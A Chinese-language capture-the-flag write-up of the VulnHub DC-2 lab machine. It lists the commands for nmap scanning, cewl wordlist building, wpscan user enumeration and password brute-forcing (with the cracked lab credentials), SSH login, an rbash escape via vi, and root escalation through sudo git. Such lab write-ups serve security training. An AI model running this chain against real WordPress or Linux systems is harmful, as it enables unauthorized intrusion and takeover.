vulnhubDC-2渗透记录

环境配置:

kali:

192.168.220.149

dc-2:

192.168,220.154

渗透过程:

首先扫描同网段,寻找活跃主机DC-2:

nmap -sP 192.168.220.0/24

192.168.220.154即为目标靶机,同样使用nmap详细扫描靶机的端口与其他服务信息

nmap -A -sV 192.168.220.154 -p 1-65535
1,靶机开启80端口

2,开始ssh服务,在7744端口,可能涉及爆破

3,重定向到http://dc-2/

由于会重定向所以要在hosts文件中手动加上DNS解析

192.168.220.154 dc-2

首先访问80端口

可以看出是wordpress,点开最右边的标签:

意思提示我们使用cewl 获得 字典,登录获得下一个flag,如果找不到,换一个用户登录


那么思路就是,通过cewl获得密码字典,爆破获得用户,进而获取下一个flag

cewl获取关键字:cewl可以遍历网站的单词,默认深度为2,默认返回一个列表,我们把结果保存

cewl dc-2 > pass.dic

由于是wordpress,使用wpscan工具进行扫描

wpscan --url dc-2 -e u
  -e 枚举
  -e u 枚举用户

可以看到枚举出三个用户:

将三个用户名保存形成user.dic,这样用户名与密码齐全,可以尝试爆破

爆破可以选用burp的inturder模块,可以用hydra

wpscan也可以:

wpscan --url dc-2 -U user.dic -P pass.dic
jerry     adipiscing
tom      parturient

下一步需要进入后台登录页面

百度一下即可知wordpress 的登录页面,也可以使用目录爆破工具爆破,

这里使用dirb工具:

dirb http://dc-2

使用tom | parturient 登录,发现什么都没有

使用另一个用户jerry登录

发现flag2

flag提示我们如果不能攻击wordpress 有其他的方式,应该是从上面的ssh入手


SSH登录:

拥有了用户名密码可以尝试登录ssh

ssh -p 7744 jerry@192.168.220.154
adipiscing
发现无法连接

尝试tom

ssh -p 7744 tom@192.168.220.154
parturient

直接ls寻找flag3.txt,cat尝试打开flag

显示commond not found

echo $0 #查看shell文件名

发现是rbash

rbash 即 restrict bash,实现了命令以及脚本在受限shell中运行,为Linux中的bash shell提供了一个额外的安全层,但是:

 rbash 提供的受限环境的安全程度取决于用户能执行的命令,很多命令都能调用外部命令,从而导致逃逸出受限环境

首先看一下当前用户能使用的命令:

如果想了解更多更多rbash绕过可以参考:

https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf

我们使用vi进行rbash绕过:

再使用shell命令即可进入bash交互

可以看到我们从rbash变成了/bin/bash

但是仍然无法使用命令,下面加入环境变量:

export PATH=$PATH:/bin
export PATH=$PATH:/usr/bin

命令即可正常使用

提示我们su到jerry,得到flag4.txt

#¥@@#¥%……¥#@,,,git就是提示

访问/root

由于目前的权限为jerry,需要提升到root


利用git 提权:

利用git有条件,使用sudo -l命令查看当前可执行的命令,必须为NOPASSWD

提权方法一:

sudo git -p --help
!'sh'
  #我们需要将shell窗口,向上拉一半,使的help内容显示不完全,从而强制进入shell

提权方法二:

sudo git help config
!/bin/bash

获取final-flag即可

Leave a Comment

您的电子邮箱地址不会被公开。 必填项已用*标注